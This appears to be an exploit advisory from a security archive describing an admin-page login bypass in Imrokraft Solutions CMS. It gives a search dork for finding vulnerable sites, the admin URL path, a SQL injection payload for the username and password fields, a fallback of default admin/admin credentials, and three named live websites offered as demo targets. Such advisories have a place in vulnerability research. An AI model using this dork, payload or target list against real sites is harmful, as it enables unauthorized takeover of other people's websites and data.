Imrokraft Solutions CMS Admin Page ByPass

2016.07.28
Credit: xBADGIRL21
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ # ____ _ ____ ____ ___ ____ _ ____ _ # __ _| __ ) / | _ / ___|_ _| _ | | |___ / | # / / _ / _ | | | | | _ | || |_) | | __) | | # > <| |_) / ___ | |_| | |_| || || _ <| |___ / __/| | # /_/_____/_/ _____/ ____|___|_| ______|_____|_| # ################################################################## # Exploit Title : Imrokraft Solutions CMS Admin Page ByPass # Exploit Author : xBADGIRL21 # Dork : intext:"Designed by Imrokraft Solutions" or intext:"Powered By : Imrokraft Solutions" # Vendor : http://www.imrokraft.com/ # Tested on: [ Windows ] # skype:xbadgirl21 # Date: 2016/07/27 # video Proof : https://www.youtube.com/watch?v=jKOHmH2XId0 ################################################################## # Describe : # This Exploit Allow The Attacker to bypass the admin # page info. # Login to the admin Dashboard Give you Full Access to # Upload or Delete .....etc # PoC: # Put [admin] After url such as : # http://site.com/admin # Now enter fill username or email and Password like the information below : # Username: '=' 'OR' # Password: '=' 'OR' # [!] OR U CAN TRY WITH DEFAULT LOGIN [!] : # Username: admin # Password: admin # Live Demo : # http://aptitudetrivandrum.com/ # http://aspirantonline.com/ # http://www.destinationdesigners.in/ ################################################################## # Discovered by : xBADGIRL21 # Greetz : All Mauritanien Hackers - NoWhere ################################################################### More of my Discovered Exploits : https://packetstormsecurity.com/files/author/12483/ http://0day.today/author/29701 https://cxsecurity.com/search/author/DESC/AND/FIND/0/10/xBADGIRL21/

References:

https://www.youtube.com/watch?v=jKOHmH2XId0


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top